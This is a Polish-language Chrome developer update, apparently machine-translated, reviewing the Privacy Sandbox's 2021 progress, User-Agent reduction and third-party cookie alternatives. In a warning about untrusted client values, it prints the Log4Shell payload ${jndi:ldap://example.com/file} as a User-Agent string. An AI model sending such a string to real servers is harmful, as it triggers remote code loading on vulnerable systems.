witamy w podsumowaniu 2021 roku w ramach programu Postęp w Piaskownicy prywatności, w którym przedstawiamy etapy na drodze do wycofania plików cookie innych firm w Chrome i pracy nad zwiększaniem prywatności w internecie. Zwykle udostępniamy przegląd aktualizacji osi czasu Piaskownicy prywatności oraz wiadomości z całego projektu, ale grudzień był spokojniejszym miesiącem. Przyjrzymy się natomiast niektórym z działań w 2021 roku i przedstawimy potencjalne rozwiązania, z którymi możecie się teraz podjąć w nowym roku.
Proces programowania Chromium
Aby nowa funkcja platformy internetowej pojawiła się w Chromium, musi przejść otwarty proces programowania. W 2021 r. zespół Piaskownicy prywatności stworzył:
| 🥚 | Zamiar tworzenia prototypu | 19 |
| 🧪 | Zamiar eksperymentu | 7 |
| 🚀 | Zamiar wysyłki | 11 |
Każdy kolejny krok to także zaproszenie do udziału w projekcie całego ekosystemu internetu.
Intencję do tworzenia prototypu to pierwszy punkt kontrolny, który zachęca do dyskusji i wstępnego eksperymentowania. Oznacza to, że oferta będzie dostępna na GitHubie, gdzie możesz zadać pytanie, tworząc problem lub dołączyć do dyskusji i prezentacji w grupach standardów, takich jak W3C i IETF. Na tym etapie zaczyna się kodowanie, co oznacza, że możesz spodziewać się, że funkcje Prototypu zostaną udostępnione do testów deweloperskich za pomocą flagi funkcji. Wstępna opinia jest niezbędna do weryfikacji ofert pakietowych i ich iteracji.
Intencja eksperymentu to opcjonalny krok, jeśli chcesz wysłać prośbę o sprawdzenie źródła. Deweloperzy mogą zarejestrować się do testowania origin funkcji, a następnie przetestować ją w wersji produkcyjnej. Nazywamy to eksperymentem, ponieważ mamy określone aspekty funkcji, które chcemy sprawdzić w rzeczywistych środowiskach. Deweloperzy, którzy mogą testować i udostępniać wyniki tych testów, przekazują cenne opinie, które pomagają w ulepszaniu tej funkcji.
Zamiar wysyłki to ostatni etap sygnalizujący, że funkcja jest już gotowa i gotowa do ogólnego udostępnienia. Po zatwierdzeniu funkcja zostanie scalona w nadchodzącą wersję, a następnie zostanie udostępniona w wersji Canary, beta i stabilnej. Pamiętaj, aby przetestować swoje witryny w Chrome w wersji Canary i Beta, co pozwoli wykryć i zgłosić wszelkie błędy, zanim funkcja stanie się stabilna.
Propozycje
Każdej ofercie Piaskownicy prywatności odpowiada repozytorium GitHub. Repozytorium zawiera wyjaśnienie z podsumowaniem ogólnej funkcjonalności, szczegółową specyfikację implementacji przez przeglądarki oraz treści z całego ekosystemu internetowego w postaci problemów i żądań pull.
W 14 repozytoriach Piaskownicy prywatności stwierdziliśmy, że:
| 💬 | 545 | Utworzone problemy |
| 250 | Zamknięto zgłoszenia | |
| 🛠️ | 261 | Żądania pull utworzone |
| 223 | Żądania pull zostały scalone |
Wyjaśnienia i specyfikacje są często kierowane do odbiorców, którzy są już obecni w standardach i programowaniu przeglądarek, co może sprawiać trudności, jeśli nie da się ich poznać. Celem objaśnienia jest jednak wyjaśnienie. Jeśli są jakieś kwestie, które są niejasne lub nie zostały omówione, prosimy o zgłoszenie problemu, abyśmy mogli zaktualizować i wyjaśnić jego treść.
Rozdzielczość
Wiosenne porządki klienta użytkownika
Odliczaliśmy coś do nowego roku, więc liczymy też w górę zarówno do Chrome 100, jak i stopniowego zmniejszenia ciągu znaków klienta użytkownika. Dlatego warto ponownie przyjrzeć się wykorzystaniu ciągu znaków klienta użytkownika w kodzie i sprawdzić, czy nie wpływa na niego któraś z tych zmian.
Aby znaleźć te obszary:
- Wyszukaj ciąg
navigator.userAgentw kodzie JavaScript lub dostęp do nagłówkaUser-Agentw kodzie serwera. - Sprawdź swoją analizę ciągu znaków pod kątem założeń dotyczących wersji 2-cyfrowej. Na przykład wyrażenie regularne określające
\d\dlub\d{2}należy zastąpić wyrażeniem\d+. - Sprawdź, czy używasz ciągu znaków we wszystkich miejscach, w których używasz:
- wersja platformy (systemu operacyjnego)
- pełna wersja kompilacji Chrome
- nazwa urządzenia mobilnego,
- Są to wartości, które w przyszłości zostaną zmniejszone do stałych ciągów znaków. Jeśli potrzebujesz dostępu do tych wartości, przejdź na wskazówki klienta User-Agent.
Warto wspomnieć o jednej z grudniowych zmian. Jeśli korzystasz ze wskazówek dotyczących klienta użytkownika, wysłaliśmy informację o zamiarze do wysyłki umożliwiającej umożliwianie przekazywania wskazówek innym źródłom w kodzie HTML za pomocą tagu <meta>. Na przykład:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
Jeśli masz entuzjastyczny nastrój wiosennych porządków, możesz rozważyć zupełnie alternatywne rozwiązanie dla klienta użytkownika. Jeśli używasz tego ciągu do wykrywania urządzeń mobilnych, sprawdź, czy możesz zastąpić go elastycznym projektowaniem. Jeśli sprawdzasz nazwę i wersję przeglądarki pod kątem obsługi funkcji, sprawdź, czy zamiast niej możesz użyć wykrywania funkcji.
Pamiętaj, że tak jak w przypadku każdej wartości podawanej przez klienta, nie zawsze jest on dokładny ani podany. Przykładem tego ryzyka jest ostatnia luka w zabezpieczeniach Log4j „Log4shell”. Klient, który ustawia w swoim ciągu znaków klienta użytkownika wartość taką jak ${jndi:ldap://example.com/file}, może uzyskać dostęp do witryny, aby aktywnie ją analizować na serwerze.
Katalogowanie plików cookie
Innym rodzajem tradycyjnych działań w nowym roku jest dbanie o to, by mieć głowę
w zdrowych ciasteczkach o wysokiej jakości. Cały czas pracujemy nad wycofywaniem plików cookie innych firm, dlatego warto sprawdzić, których plików cookie dotyczy ta zmiana. W 2020 roku trzeba było oznaczyć wszystkie pliki cookie do użytku w innych witrynach lub innych witrynach za pomocą metody SameSite=None.
Każdy plik cookie, w którym atrybut SameSite ma wartość None, będzie wymagał aktualizacji.
W tej chwili możesz rozważyć 3 sposoby:
- Jeśli plik cookie jest wymagany tylko w relacji 1:1 z witryną najwyższego poziomu, postępuj zgodnie z postępami opisanymi w propozycji CHIPS. Oznacza to dodanie do pliku cookie atrybutu
Partitioned. - Jeśli plik cookie jest używany w kontekście innych witryn, ale tylko w witrynach, które do Ciebie należą i które obsługujesz, może się kwalifikować do użycia w zestawach źródeł własnych. Wymaga to zdefiniowania witryn w zestawie i dodania do pliku cookie atrybutu
SameParty. - Jeśli plik cookie służy do dostarczania wartości wspólnej wielu witrynom, przejrzyj szerszy zestaw propozycji Piaskownicy prywatności, aby znaleźć alternatywne rozwiązanie, które nie opiera się na śledzeniu w witrynach.
Jeśli dbasz przede wszystkim o zdrowie, jest to dobry moment, by jeszcze raz przyjrzeć się używaniu plików cookie – mamy dobry przepis na ulepszenie własnych plików cookie.
Prześlij opinię
Publikujemy te comiesięczne aktualizacje i wprowadzamy postępy w całej Piaskownicy prywatności. Chcemy mieć pewność, że deweloperzy otrzymują potrzebne informacje i pomoc. Jeśli zauważysz, że możemy coś ulepszyć w tej serii, daj nam znać na @ChromiumDev na Twitterze. Dzięki Twoim odpowiedziom będziemy mogli pracować nad ulepszaniem tego formatu.
Zapoznaj się z najczęstszymi pytaniami na temat Piaskownicy prywatności, które stale rozwijamy w zależności od problemów zgłoszonych przez Ciebie do repozytorium pomocy dla deweloperów. Jeśli masz pytania dotyczące testowania lub wdrażania dowolnej z tych propozycji, skontaktuj się z nami.